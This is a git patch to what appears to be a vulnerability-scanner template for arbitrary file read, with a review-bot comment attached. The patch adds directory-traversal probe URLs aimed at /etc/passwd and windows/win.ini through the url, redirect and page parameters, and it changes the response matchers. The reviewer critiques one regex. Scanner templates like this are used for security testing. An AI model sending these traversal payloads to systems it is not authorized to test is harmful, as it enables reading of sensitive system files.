From 471daf1bfd23a43cb275b322997b49f8c5f2bfe8 Mon Sep 17 00:00:00 2001
From: bauthard <8293321+bauthard@users.noreply.github.com>
Date: Fri, 2 Oct 2020 22:22:52 +0530
Subject: [PATCH] Update arbitrary-file-read.yaml
---
 vulnerabilities/arbitrary-file-read.yaml | 19 +++++++++++++++----
 1 file changed, 15 insertions(+), 4 deletions(-)
diff --git a/vulnerabilities/arbitrary-file-read.yaml b/vulnerabilities/arbitrary-file-read.yaml
index 83e28609ef..e1fb95913b 100644
--- a/vulnerabilities/arbitrary-file-read.yaml
+++ b/vulnerabilities/arbitrary-file-read.yaml
@@ -11,8 +11,19 @@ requests:
 path:
 - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
 - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+ - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+ - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
+ - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+ - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+
+ matchers-condition: and
 matchers:
- - type: word
- words:
- - "root:x"
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ - "\\[(font|extension|file)s\\]"
+ condition: or
+ part: body
\ No newline at end of file
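Review bot: In the new regex matcher, the second pattern `\\[(font|extension|file)s\\]` is satisfied by a single bracketed token such as `[files]` anywhere in a 200 body, which is weak evidence that win.ini was actually returned and will likely raise false positives on documentation or on pages that echo bracketed text. I would replace that entry with a marker more specific to the file, for example `- "; for 16-bit app support"` (the comment line win.ini normally starts with; worth confirming against the Windows versions you care about), and leave `root:[x*]:0:0:` as it is. The file also loses its trailing newline here (`\ No newline at end of file`), which yamllint reports. The `requests:` entry begins above the hunk, so the method and any other request settings are not visible from here.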